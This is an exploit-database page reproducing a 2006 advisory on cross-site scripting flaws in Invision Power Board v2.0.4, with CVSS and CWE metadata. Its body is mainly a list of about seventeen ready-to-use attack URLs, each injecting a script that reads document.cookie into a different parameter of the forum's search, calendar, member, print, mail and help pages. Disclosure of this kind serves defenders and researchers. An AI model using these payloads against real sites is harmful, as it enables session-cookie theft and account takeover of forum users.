Advertisement






XSS IN Invision Power Board

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unnamed High Remote 2006-03-23
CPE
cpe:cpe:/a:invisionpower:invision_power_board
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 0.02644 0.58483

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006030088

Below is a copy:

Software: Invision Power Board

Web Site:http://www.invisionpower.com

tested in v2.0.4

exploit :

forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb024288988
9796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie)
</script>

forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb024288988
9796819a2b367&search_in='><script>alert(document.cookie)</script>&result
_type=posts

foum/index.php?act=Search&nav='><script>alert(document.cookie)</script>

forum/index.php?showtopic=1&st='><script>alert(document.cookie)</script>

forum/index.php?s=504b8a357b04e1b276f08a039955177f&act=Search&nav=au&COD
E=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>ale
rt(document.cookie)</script>
forum/index.php?s=21355e75e21dcc4c04e24c5c7247b220&act=Search&CODE=01&fo
rums='><script>alert(document.cookie)</script>

forum/index.php?s='><script>alert(document.cookie)</script>&act=Search&C
ODE=01&forums=all

forum/index.php?act=calendar&code=birthdays&y=[any 
year]&m='><script>alert(document.cookie)</script>&d=[any day]

forum/index.php?act=calendar&code=birthdays&y='><script>alert(document.c
ookie)</script>&m=[any 
month]&d=[any day]

forum/index.php?act=calendar&code=birthdays&y=[any year]&m=[any 
month]&d='><script>alert(document.cookie)</script>

forum/index.php?act=Print&client=printer&f=1&t='><script>alert(document.
cookie)</script>

forum/index.php?act=Mail&CODE=00&MID='><script>alert(document.cookie)</s
cript>

forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</s
cript>

forum/index.php?act=search&CODE=getnew&active='><script>alert(document.c
ookie)</script>&lastdate=1

forum/index.php?act=Members&max_results=10&sort_key=posts&sort_order='><
script>alert(document.cookie)</script>

forum/index.php?act=Members&max_results='><script>alert(document.cookie)
</script>&sort_key=posts&sort_order=desc

forum/index.php?act=Members&max_results=10&sort_key='><script>alert(docu
ment.cookie)</script>&sort_order=desc&sort_order=desc

all 17 XSS are tested in v2.0.4

Discovered by: Mr.SNAKE

GreeTz : T0 mY a11 Fr!nD in www.lezr.com

special thnx for pppppp

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.com/

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum